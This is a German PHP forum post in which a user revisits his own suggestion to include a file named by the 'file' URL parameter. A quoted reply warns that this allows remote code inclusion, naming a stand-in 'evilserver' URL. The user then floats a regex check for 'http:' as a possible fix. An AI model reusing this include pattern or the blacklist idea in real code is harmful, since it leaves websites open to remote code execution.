Hallo,

Schreibe, an die Stelle, an der sich z.Zt. der iframe befindet also einfach

<?php
if (isset($_GET["file"]))
include ($_GET["file"])
else
include "Startseite.inc"
?>

>   
> Wenn du möchtest, dass beliebiger externer Code ausgeführt werden soll, dann kannst du das natürlich so machen.  
>   
> Denk einfach nur folgendes Szenario: allow\_url\_fopen = true, $\_GET['file'] = "http://evilserver.example.com/evilscript.txt" und in dieser Datei steht dann PHP-Schadcode.  
  
Hm, daran hatte ich gar nicht gedacht :-(  
Vielleicht sollte man zuerst mit regulären Ausdrücken prüfen, ob der String kein „http:“ oder so hat…  
  
Alternativ:  
Kann man PHP sagen, dann er die includete Datei nicht ausführen soll? Also einfach nur als HTML einfügen und alle <?php … ?> ignorieren?  
  
mfg. Daniel

-- 
[Experten raten von der Verwendung des Internet Explorers ab!](http://web.oesterchat.com/internet-explorer/)  
[Mein SELF-stylesheet](http://danielrichter.da.funpic.de/SELFForumsCSS.html) | [Darum Firefox!](http://www.firefox-love.de/)  
[Selfcode](http://forum.de.selfhtml.org/cgi-bin/selfcode.pl): [ie:{ fl:| br:> va:| ls:# fo:| rl:( n4:# ss:{ de:> js:| ch:? mo:) zu:}](http://www.peter.in-berlin.de/projekte/selfcode/?code=ie%3A%7B+fl%3A%7C+br%3A%3E+va%3A%7C+ls%3A%23+fo%3A%7C+rl%3A%28+n4%3A%23+ss%3A%7B+de%3A%3E+js%3A%7C+ch%3A%3F+mo%3A%29+zu%3A%7D)